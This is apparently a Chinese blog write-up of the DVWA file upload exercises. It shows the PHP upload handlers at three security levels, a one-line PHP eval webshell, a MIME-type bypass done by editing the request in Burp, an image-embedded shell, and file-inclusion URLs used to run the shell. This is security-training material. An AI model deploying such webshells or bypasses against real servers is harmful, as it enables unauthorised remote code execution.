DVWA-File upload

最新推荐文章于 2024-04-07 14:45:22 发布
最新推荐文章于 2024-04-07 14:45:22 发布
阅读量152 收藏
点赞数
分类专栏: DVWA与sqli-lab
原文链接:https://www.freebuf.com/articles/web/119467.html
版权

Low级别
源代码如下

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 
?>

low级别没有做任何过滤
我们上传一句话木马。

<?php @eval($_POST[yjh])?>

在这里插入图片描述
上传成功。
菜刀连接一下。
在这里插入图片描述
在这里插入图片描述
Medium级别
源代码如下

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 

    // Is it an image? 
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 

        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

这里对上传文件做了过滤,只允许图片格式上传。
在这里插入图片描述
上传成功。
菜刀连接。
在这里插入图片描述
可是获取不到权限,可以利用文件包含漏洞来获取权限.
在菜刀中添加这一行重新连接一下。
http://ybz.dvwa.com/vulnerabilities/fi/?page=http://ybz.dvwa.com/hackable/uploads/yjh.png
在这里插入图片描述
获取权限。
Burp改包方式上传。
在这里插入图片描述
上传成功。
在这里插入图片描述
菜刀连接
在这里插入图片描述

High级别
源代码如下

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    // Is it an image? 
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 

        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

这里允许上传.jpg .png .jpeg的格式上传。
图片马制
在这里插入图片描述
在这里插入图片描述
上传成功。
在这里插入图片描述
木马连接地址:http://ybz.dvwa.com/vulnerabilities/?page=file:///var/www/html/dvwa/hackable/uploads/tpyjh.jpg
在这里插入图片描述
参考链接
原作者:lonehand 参考转自:freebuff.com

https://www.freebuf.com/articles/web/119467.html

bye_X
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA--upload
weixin_30385925的博客
05-21 232
文件上传漏洞 0x01了解文件上传漏洞的用处是用来干什么的 什么是文件上传漏洞? 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件...
DVWA-文件上传(File Upload
weixin_58954236的博客
08-20 727
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA-文件上传upload
Cwillchris的博客
10-28 2050
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、查看源码及分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? //文件的目标路径hackable/uploads/,也就是文件上传的位置 $target_path = DVWA_WEB
DVWA---文件上传
孤的博客
11-20 406
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWAFile Upload(文件上传)
RexHa的博客
10-02 2667
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA靶场-----FIle Upload(文件上传)
m0_65712192的博客
11-14 1891
DVWA靶场-----FIle Upload(文件上传)
DVWA靶场系列(四)—— File Upload(文件上传)
qq_45612828的博客
07-12 5870
DVWA靶场系列(四)—— File Upload(文件上传)
DVWA -File Upload-通关教程-完结
最新发布
刘箫-技术库
04-07 1559
这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。但是此时是不能用蚁剑连接的,因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。如果收到了该请求,说明用户尝试上传文件。
DVWAUpload全级笔记
底层社会中的弱智
06-04 446
LOW: 下列代码只是实现了上传,没有任何的门槛 <?php if (isset($_POST['Upload'])) { //isset函数的意思判断是否是POST的方式上传的 $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $...
DVWA Upload漏洞(medium)
1ame的博客
09-19 1734
<?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path . basename($_FILES['uploaded']['name']);
DVWAupload文件上传漏洞(全难度)(小白向)
xihaxiha9的博客
04-19 2530
DVWA的文件上传详解
dvwa的文件上传漏洞验证upload
小雨的博客
03-28 3822
DVWA = Damn Vulnerable Web App 长这样 upload漏洞upload 可上传文件来实现利用 利用weevly生成一个shell脚本 weevely简介:weevely是一款基于python编写的webshell生成、管理工具。 weevely generate 123456 /root/shell.php 然后上传这个shell 出现successful uploaded, 然后呢,构造url看这个shell是否上传成功。如...
DVWA-File Upload文件上传
mlws1900的博客
03-16 967
黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
DVWA之文件上传
giun的博客
03-09 1259
一、尝试low等级 我们上传一个phpinfo.php文件,文件内容为&amp;lt;?php echo pphpinfo()?&amp;gt;, 把路径拼接起来,输入 http://localhost/DVWA/hackable/uploads/phpinfo.php 成功获得执行我们上次的文件 我们再上传个一句话木马文件 然后直接尝试系统命令 http://localhost/DVWA/hackabl...
DVWA--FileUpload
weixin_45038413的博客
05-09 452
Low 等级 上传正常图片 https://dvwa.practice.rois.io/vulnerabilities/upload/ + …/…/hackable/uploads/1.jpg =https://dvwa.practice.rois.io/hackable/uploads/1.jpg 上传一句话木马 连接AntSword Medium 等级 上传php文件失败,显示只允...
DVWA File Upload 教程
哎呦喂的博客
04-07 1584
File Upload,即文件上传。文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 先看常规的文件上传操作: 客户端上传: <html> <head> <meta http-equiv="Content-Type" content=...
DVWAFile Upload模块展开实验
06-10
好的,我可以为您提供一些关于DVWAFile Upload模块的实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值